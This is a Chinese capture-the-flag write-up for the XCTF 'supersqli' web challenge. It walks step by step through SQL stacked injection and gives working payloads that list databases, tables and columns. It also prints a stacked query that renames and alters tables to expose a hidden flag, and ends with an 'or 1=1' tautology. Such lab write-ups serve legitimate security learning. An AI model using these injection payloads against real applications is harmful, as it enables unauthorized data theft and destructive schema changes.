【XCTF高手进阶区】web5_supersqli writeup(旧)

web5_supersqli

原题链接

key:SQL堆叠注入+表名修改rename

 

①题目打开后依旧是这个样子的👇

这题虽然还是SQL注入题,但是在旧版本中额外增设了一点难度

 

②和上一篇wp一样,几次尝试提交后得知是单引号闭合,字段数是2

随后尝试联合查询输入

提交inject=1' union select 1,2#后返回了这玩意👇

依旧是这个六亲不认的正则表达式

大小写?nos!双写绕过?nos!

 

③还是需要堆叠注入来查询全部的数据库名👇

1';show databases; #

查询全部表名👇

1';show tables; #

查看这个名字式数字的表存在哪些字段👇

1';show columns from`1919810931114514`;#

这里的表名为数字(字符串),我们要用反引号

 

④想办法查看这个flag字段

这里只有两个表,我们输入1查询出来的结果应该来自words表里

我们又可以通过1' or 1=1#查出这个表中的所有信息

所以这里的思路就是通过把表名1919810931114514改为words,把原来的words表名改成别的名

因为因为没有限制alter,rename和change,所以可以通过修改表名来查flag👇

1';rename tables words to Mitchell;rename tables `1919810931114514` to words;alter table words change flag id varchar(100);#

这里把1919810931114514改成了words,把words改成了Mitchell

 

⑤最后用永真表达式来爆字段

1' or 1=1#

得出flag👇

 

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Mitch311

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值